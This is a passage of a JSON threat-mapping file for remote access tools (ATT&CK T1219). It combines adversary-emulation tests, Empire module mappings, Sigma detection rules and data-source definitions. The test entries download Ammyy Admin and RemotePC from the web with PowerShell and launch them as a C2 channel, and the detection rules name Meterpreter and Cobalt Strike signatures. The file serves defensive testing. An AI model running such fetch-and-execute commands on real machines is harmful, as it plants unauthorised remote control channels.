$installer /qn\n", + "cleanup_command": "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nmsiexec /x $installer /qn\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Ammyy Admin Software Execution", + "auto_generated_guid": "0ae9e327-3251-465a-a53b-485d4e3f58fa", + "description": "An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. \nUpon successful execution, Ammyy Admin will be executed. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Ammyy_Admin_Path": { + "description": "Path of Ammyy Admin executable", + "type": "Path", + "default": "$env:temp\\ammyy.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})\n", + "prereq_command": "if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe\" -Destination \"$env:temp\\ammyy.exe\" -dynamic\n" + } + ], + "executor": { + "command": "Start-Process #{Ammyy_Admin_Path}\n", + "cleanup_command": "Stop-Process -Name \"Ammyy\" -force -erroraction silentlycontinue\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "RemotePC Software Execution", + "auto_generated_guid": "fbff3f1f-b0bf-448e-840f-7e1687affdce", + "description": "An adversary may attempt to trick the user into downloading RemotePC Software for use as a C2 channel. \nUpon successful execution, RemotePC will be executed. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "RemotePC_Path": { + "description": "Path of RemotePC executable", + "type": "Path", + "default": "$env:temp\\RemotePC.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "RemotePC must exist on disk at the specified location (#{RemotePC_Path})\n", + "prereq_command": "if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe\" -Destination \"#{RemotePC_Path}\" -dynamic\n" + } + ], + "executor": { + "command": "Start-Process #{RemotePC_Path}\n", + "cleanup_command": "Unregister-ScheduledTask -TaskName \"RemotePC\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"RPCServiceHealthCheck\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"ServiceMonitor\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"StartRPCService\" -Confirm:$False -ErrorAction SilentlyContinue \nStop-Process -Name \"RemotePCPerformance\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCPerformanceService\" -force -erroraction silentlycontinue\nStop-Process -Name \"RemotePCUIU\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCDownloader\" -force -erroraction silentlycontinue\nStop-Process -Name \"RemotePCService\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCService\" -force -erroraction silentlycontinue\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "Empire Module": "powershell/management/vnc", + "ATT&CK Technique #1": "T1219", + "ATT&CK Technique #2": "", + "Technique": "Remote Access Tools", + "Concatenate for Python Dictionary": "\"powershell/management/vnc\": [\"T1219\"]," + }, + { + "Empire Module": "python/management/osx/screen_sharing", + "ATT&CK Technique #1": "T1219", + "ATT&CK Technique #2": "T1021", + "Technique": "Remote Access Tools", + "Concatenate for Python Dictionary": "\"python/management/osx/screen_sharing\": [\"T1219\",\"T1021\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Antivirus Exploitation Framework Detection", + "id": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "date": "2018/09/09", + "modified": "2019/01/16", + "author": "Florian Roth", + "references": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ], + "logsource": { + "product": "antivirus" + }, + "detection": { + "selection": { + "Signature": [ + "*MeteTool*", + "*MPreter*", + "*Meterpreter*", + "*Metasploit*", + "*PowerSploit*", + "*CobaltSrike*", + "*Swrort*", + "*Rozena*", + "*Backdoor.Cobalt*" + ] + }, + "condition": "selection" + }, + "fields": [ + "FileName", + "User" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Suspicious TSCON Start", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "references": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + ], + "author": "Florian Roth", + "date": "2018/03/17", + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "User": "NT AUTHORITY\\SYSTEM", + "Image": "*\\tscon.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized 